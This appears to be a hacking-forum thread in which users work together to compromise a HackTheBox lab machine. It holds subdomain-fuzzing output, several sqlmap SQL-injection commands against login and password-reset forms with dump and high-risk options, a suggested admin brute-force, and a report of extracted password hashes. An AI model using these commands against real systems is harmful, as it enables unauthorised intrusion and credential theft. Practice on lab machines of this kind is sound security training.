Possibly Related Threads…

hexforce · 08-24-2024, 08:50 PM

anyone on privcesc?

osamy7593 · 08-24-2024, 08:56 PM

(08-24-2024, 08:49 PM)upl04d3r Wrote:
(08-24-2024, 08:42 PM)osamy7593 Wrote: it was patched guys ..

we have another subdomains

:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
:: Filter : Response size: 13560
________________________________________________

cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 338ms]
www.marketing [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9981ms]
setup [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9983ms]
rpc [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9986ms]
zeta [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9989ms]
ibank [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9987ms]
helm [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9990ms]
mailgateway [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9978ms]

nope, its redirected to main page. You have a bad syntax in ffuf

no it's correct .. but yeah it redirects .. we have also admin username in the main domian er can try brute force

teky · 08-24-2024, 08:57 PM

(08-24-2024, 08:50 PM)hexforce Wrote: anyone on privcesc?

bro how is this command not right ```sqlmap -u "http://cacti.monitorsthree.htb/cacti/" --data="username=*&password=test" -p username -cookie Cacti=h4v409j8j5nqun04m0emlp3gmi --dbms=mysql --technique=T --dump```

UnkownWombat · 08-24-2024, 09:08 PM

(08-24-2024, 08:57 PM)teky Wrote:
(08-24-2024, 08:50 PM)hexforce Wrote: anyone on privcesc?

bro how is this command not right ```sqlmap -u "http://cacti.monitorsthree.htb/cacti/" --data="username=*&password=test" -p username -cookie Cacti=h4v409j8j5nqun04m0emlp3gmi --dbms=mysql --technique=T --dump```

sqlmap -u http://monitorsthree.htb/login.php --forms --crawl 2 --dbs --all
is working for me but super slowly

jsvensson · 08-24-2024, 09:23 PM

sqli is not in login but in forgot_password

hexforce · 08-24-2024, 09:24 PM

Seeing git on the machine. Is there a port we need to forward to use the git creds?

MhmmdSr5 · 08-24-2024, 09:27 PM

(08-24-2024, 09:23 PM)jsvensson Wrote: sqli is not in login but in forgot_password

sqlmap --dbms=mysql -r forgotPass.req -p username --level 5 --risk 3 --dbs

I am using this command. 30 minutes and didn't succeed..
Is the command wrong or is the machine having an issue ?

rugeleon · 08-24-2024, 09:29 PM

(08-24-2024, 09:08 PM)UnkownWombat Wrote:
(08-24-2024, 08:57 PM)teky Wrote:
(08-24-2024, 08:50 PM)hexforce Wrote: anyone on privcesc?

bro how is this command not right ```sqlmap -u "http://cacti.monitorsthree.htb/cacti/" --data="username=*&password=test" -p username -cookie Cacti=h4v409j8j5nqun04m0emlp3gmi --dbms=mysql --technique=T --dump```
sqlmap -u http://monitorsthree.htb/login.php --forms --crawl 2 --dbs --all
is working for me but super slowly

"sqlmap -r forgot_password.req --batch --dbs --level 3 --risk 3 --dbms=mysql --technique=T -D monitorsthree_db --tables --null-connection"
really slow!!

Norah8119 · 08-24-2024, 09:31 PM

(08-24-2024, 09:24 PM)hexforce Wrote: Seeing git on the machine. Is there a port we need to forward to use the git creds?

could you check your dm's :)

wtfduw · 08-24-2024, 09:32 PM

I am getting password hashes, I believe there are 4 of them. But it is reaaaally slow

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	360	88,710	03-28-2026, 09:28 AM Last Post: catsweet
	[FREE] HTB-ProLabs APTLABS Just Flags	kewlsunny	23	2,348	03-28-2026, 03:30 AM Last Post: lulaladrow
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	87	7,490	03-27-2026, 07:22 PM Last Post: stn
	HTB Eloquia User and Root Flags - Insane Box	69646B	13	350	03-27-2026, 06:14 PM Last Post: vlxw
	HTB - ALL Challenges you Stuck in	osamy7593	2	646	03-27-2026, 04:24 PM Last Post: catsweet